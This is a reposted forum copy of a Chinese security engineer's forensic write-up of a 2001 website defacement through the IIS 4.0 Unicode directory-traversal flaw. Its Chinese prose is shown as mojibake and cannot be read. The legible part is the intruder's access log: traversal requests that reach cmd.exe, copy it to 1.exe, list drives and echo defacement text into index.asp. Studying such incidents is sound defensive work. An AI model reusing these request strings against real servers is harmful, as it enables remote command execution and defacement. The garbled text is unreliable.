¾«»ªÇø [¹Ø±Õ][·µ»Ø]
µ±Ç°Î»ÖãºÍøÒ×¾«»ªÇø>>ÌÖÂÛÇø¾«»ª>>ÍøÂçרÇø>>¡ñ Internet>>
ä¯ÀÀ¼¼ÇÉ
>>ÃÀ¹úºÚ¿ÍÊÇÈçºÎÏ®»÷ÖйúÍøÕ¾µÄ£¿

Ö÷Ì⣺ÃÀ¹úºÚ¿ÍÊÇÈçºÎÏ®»÷ÖйúÍøÕ¾µÄ£¿
·¢ÐÅÈË: xmzw(СÃ×Öà)
ÕûÀíÈË: snowypeng(2002-05-23 09:29:24), Õ¾ÄÚÐżþ

  ¡¾ChinaByte ×ÛºÏÏûÏ¢¡¿
¡¡¡¡×÷ÕߣºÖìСӢ 

¡¡¡¡ÎÒÊÇ°²Â繫˾µÄ°²È«¹¤³Ìʦ¡£×î½üÃÀ¹úºÚ¿ÍÒòײ»úʼþ¶ÔÎÒ¹úһЩÕþ¸®ÍøÕ¾·¢¶¯¹¥»÷£¬À´ÊÆÐ×ÃÍ£¬ÎÒ¹«Ë¾°²È«½ô¼±ÏìÓ¦ÖÐÐÄÒѾ­½Óµ½7¡¢8¸öÕâÑùµÄ°¸Àý¡£ 

¡¡¡¡¸ù¾ÝÎÒÃǶÔÕâЩ°¸ÀýµÄÈëÇÖ¹ý³Ì·ÖÎö£¬·¢ÏÖÃÀ¹úºÚ¿Í²¢Ã»ÓвÉÓ÷dz£¸ßÃ÷µÄÊֶΣ¬¶ø´ó¶àÊÇÑ¡ÔñÈõÕߣ¬ÕÒÄÇЩ°²È«·À»¤´ëÊ©×öµÃºÜÉÙµÄÍøÕ¾½øÐй¥»÷£¬ÆäÖÐÓõ½Á˼¸¸öΣº¦ºÜ´óµÄ°²È«Â©¶´£¬ÏÂÃæµÄÒ»¸öÀý×ÓÔÚÎÒ¹úºÜ¶àÍøÕ¾É϶¼ºÜ³£¼û¡£Ï£Íû¹óÍøͨ¹ý»¥ÁªÍøýÌåµÄÐÎʽ£¬½«ÀàËÆÕâÑùµÄÈëÇÖ°¸ÀýÅú¶³öÀ´£¬ÒýÆð´ó¼ÒµÄ¾¯¾õ£¬²¢²Éȡʵ¼Ê´ëÊ©¼ÓÒÔ·À»¤¡£Ï£Íû»¥ÁªÍøýÌå²»½ö½öÈÈÖÐÓÚ±¨µÀ¹¥»÷ʼþ£¬Ò²½«Ò»Ð©Öصã·Åµ½°²È«·À»¤ÉÏÀ´£¬ÕâÑù¼ÈÓÐÐÂÎżÛÖµ£¬ÓÖÄܶԶÁÕßÌṩ°ïÖú¡£Ð»Ð»£¡ 

¡¡¡¡¹ØÓÚwww.xxxx.xxx.cnµÄÈëÇÖ·ÖÎö 

¡¡¡¡Ò»£ºÊ¼þ±³¾° 

¡¡¡¡¹ã¶«Ä³ÊÐC¾ÖËùÊôÍøÕ¾www.xxx.com.cn (IP: 61.xxx.xxx.17)ÓÚ2001Äê4ÔÂÆÚ¼äÔâµ½ºÚ¿Í¶ñÒâ¹¥»÷£¬Ôì³ÉÍøÕ¾ÍøÒ³±»Ð޸ġ£ÔÚ´ËÇé¿öÏ£¬ÉîÛÚÊа²Âç¿Æ¼¼ÓÐÏÞ¹«Ë¾ÓÚ2001Äê4ÔÂ17ÈÕÊÜijÊÐS¾ÖµÄίÍÐ,Ç°Íù»ú·¿ÏÖ³¡È¡Ö¤¡£ 

¡¡¡¡¶þ£º·þÎñÆ÷»ù±¾Çé¿öÒÔ¼°ÒÑ»ñÈ¡×ÊÁϸ÷þÎñÆ÷²Ù×÷ϵͳΪWindows Nt Server 4.0,°²×°ÓÐIIS 4.0 ,¶ÔÍâʹÓÃFIREWALLÆÁ±Î,Ö»¿ª·ÅWEB·þÎñ¡£ÎÒ·½¼¼ÊõÔ±ÊÕ¼¯»ñµÃMS IIS 4.0 2001Äê4ÔÂ13ÈÕÖÁ 4ÔÂ17ÈÕHTTPLOG ºÍFTPLOG¡£ 

¡¡¡¡Èý£º·ÖÎö 

¡¡¡¡ÓÉÓÚ¸ÃÕ¾ÊÜÈëÇÖºóµÄÖ±½ÓÏÖÏóΪÍøÒ³±»ÐÞ¸Ä. ²¢ÇÒ¸ÃÕ¾Êܵ½PIX FIREWALL·ÀÎÀ,¶ÔÍâÖ»¿ª·Å80¶Ë¿Ú,ËùÒÔ³õ²½¹À¼ÆÊÇͨ¹ýIISÔ¶³Ì©¶´»ñµÃϵͳ¿ØÖÆȨµÄ,IIS 4.0ĬÈÏÏ´æÔÚism.dll,msadcs.dll,unicodeµÈ»ñµÃÍøÒ³ÐÞ¸ÄȨÏÞµÄÔ¶³Ì©¶´¡£ÓÚÊÇÎÒ¹«Ë¾¼¼ÊõÈËÔ±¶Ô¸Ã·þÎñÆ÷µÄMS IIS 4.0 2001Äê8ÔÂ17ÈÕÖÁ 4ÔÂ17ÈÕHTTPLOGÈÕÖ¾Îļþ½øÐÐÏêϸµÄ·ÖÎöºÍ¹ýÂË£¬µÃ³öÒÔϽáÂÛ£º 

¡¡¡¡ÈëÇÖÕßÀûÓÃunicode©¶´,´Ó¶ø¿ÉÒÔʹÓÃweb¶Ë¿ÚÌá½»Ö´ÐÐÃüÁîµÄÇëÇó,ÐÞ¸ÄÍøÕ¾Ö÷Ò³¡£ 

¡¡¡¡×¢£ºÂ©¶´ÏêϸÐÅÏ¢Çë¼û£º http://www.cnns.net/article/db/822.htm 

¡¡¡¡±»¸ü¸ÄµÄÒ³ÃæÈçÏÂ: 

¡¡¡¡ÒÔÏÂΪÈëÇÖÕßµÄÈëÇÖÐÐΪ¼Ç¼£º 

¡¡¡¡ÆäÖТ٣ºÈëÇÖÕßIP ¢Ú £ºÈÕÆÚ ¢Û£ºÊ±¼ä ¢Ü£ºÊ¹Ó÷½·¨ ¢Ý£º±»·ÃÎÊURL 

¡¡¡¡¢Þ·þÎñÆ÷·µ»ØºÅ 

¡¡¡¡Èç¹û¢Þ·þÎñÆ÷·µ»ØºÅΪ200ÔòÈëÇÖÕ߳ɹ¦ÀûÓÃunicode©¶´Ö´ÐÐÁËÃüÁî¡£ 

¡¡¡¡¢Ù ¢Ú ¢Û ¢Ü ¢Ý ¢Þ 

¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /scripts/..ü€€€€?./winnt/system32/cmd.exe, /c+dir+c: 500 

¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /scripts/..?../winnt/system32/cmd.exe, /c+dir+c: 500 

¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:21 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:21 GET /_vti_bin/../../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:23 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:23 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:23 GET /scripts/..ð€€?./winnt/system32/cmd.exe, /c+dir+c: 500 

¡¡¡¡152.158.208.65 01-4-17 4:34:23 GET /msadc/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 4:34:25 GET /scripts/..o../winnt/system32/cmd.exe, /c+dir+c: 404 

¡¡¡¡152.158.208.65 01-4-17 4:34:25 GET /scripts/..?../..?../mssql7/install/pubtext.bat"+&+dir+c: 403 

¡¡¡¡152.158.208.65 01-4-17 4:34:25 GET /scripts/..ø€€€?./winnt/system32/cmd.exe, /c+dir+c: 500 

¡¡¡¡152.158.208.65 01-4-17 4:34:25 GET /à€?./winnt/system32/cmd.exe, /c+dir+c: 404 

¡¡¡¡152.158.208.65 01-4-17 5:21:17 GET /scripts/..../winnt/system32/cmd.exe, /c+set 502 

¡¡¡¡152.158.208.65 01-4-17 5:21:37 GET /scripts/..../winnt/system32/cmd.exe, 

¡¡¡¡/c+copy+c:winntsystem32cmd.exe+c:Inetpubscripts1.exe 502 

¡¡¡¡152.158.208.65 01-4-17 5:24:32 GET /scripts/..../Inetpub/scripts/1.exe, /c+dir+c: 200 

¡¡¡¡152.158.208.65 01-4-17 5:24:38 GET /scripts/..../Inetpub/scripts/1.exe, /c+set 502 

¡¡¡¡152.158.208.65 01-4-17 5:24:49 GET /scripts/..../Inetpub/scripts/1.exe, 

¡¡¡¡/c+dir+C:InetPubwwwrootfastinfo 200 

¡¡¡¡152.158.208.65 01-4-17 5:25:10 GET /scripts/..../Inetpub/scripts/1.exe, 

¡¡¡¡/c+echo+rty>C:InetPubwwwrootfastinfoindex.asp 502 

¡¡¡¡152.158.208.65 01-4-17 5:25:19 GET /index.asp 200 

¡¡¡¡152.158.208.65 01-4-17 5:25:37 GET /scripts/..../Inetpub/scripts/1.exe, 502 

¡¡¡¡

¡¡¡¡/c+echo+^^^join+us:[email protected]^^^^^^^^^^^^^^^^^^^^^^[SecurityNewsPortal.com]^^^^^^^^^>C:InetPubwwwrootfastinf

¡¡¡¡oindex.asp 502 

¡¡¡¡152.158.208.65 01-4-17 5:25:43 GET /index.asp 200 

¡¡¡¡´ÓÒÔÉÏ·ÖÎöÎÒÃÇ¿ÉÒÔÇå³þµÄ¿´µ½ÔÚ2001Äê4ÔÂ17ÈÕÀ´×ÔͬһIPµÄÈëÇÖÕßÊÔͼʹÓÃunicode©¶´Ô¶³ÌÖ´ÐÐÃüÁ´ïµ½ÐÞ¸ÄÍøÒ³µÄÄ¿µÄ¡£ 

¡¡¡¡¹¥»÷ʱ¼äΪ: 2001Äê4ÔÂ17ÈÕ4:34:19£­2001Äê4ÔÂ17ÈÕ5:25:43 

¡¡¡¡ÈëÇÖÕßIPµØַΪ£º 152.158.208.65 À´×ÔÓÚÃÀ¹ú 

¡¡¡¡ËÄ£º½áÂÛ 

¡¡¡¡ÈëÇÖÕßÊÇÀûÓÃUnicodeÔ¶³Ì©¶´»ñµÃϵͳ¿ØÖÆȨ£¬¶à´ÎÔ¶³ÌÖ´ÐÐÃüÁÁ˽â·þÎñÆ÷½á¹¹ºó£¬ÐÞ¸ÄÍøÕ¾Ö÷Ò³¡£ 

¡¡¡¡Ëø¶¨IPΪ£º 152.158.208.65 À´×ÔÓÚÃÀ¹ú 

¡¡¡¡¹¥»÷ʱ¼äΪ£º 2001Äê4ÔÂ17ÈÕ4:34:19£­2001Äê4ÔÂ17ÈÕ5:25:43 

¡¡¡¡ÈëÇÖÕßÎïÀíµØַΪÃÀ¹ú 
 
 



----
http://go8.163.com/~xmzw/rabbit.gif 
[¹Ø±Õ][·µ»Ø]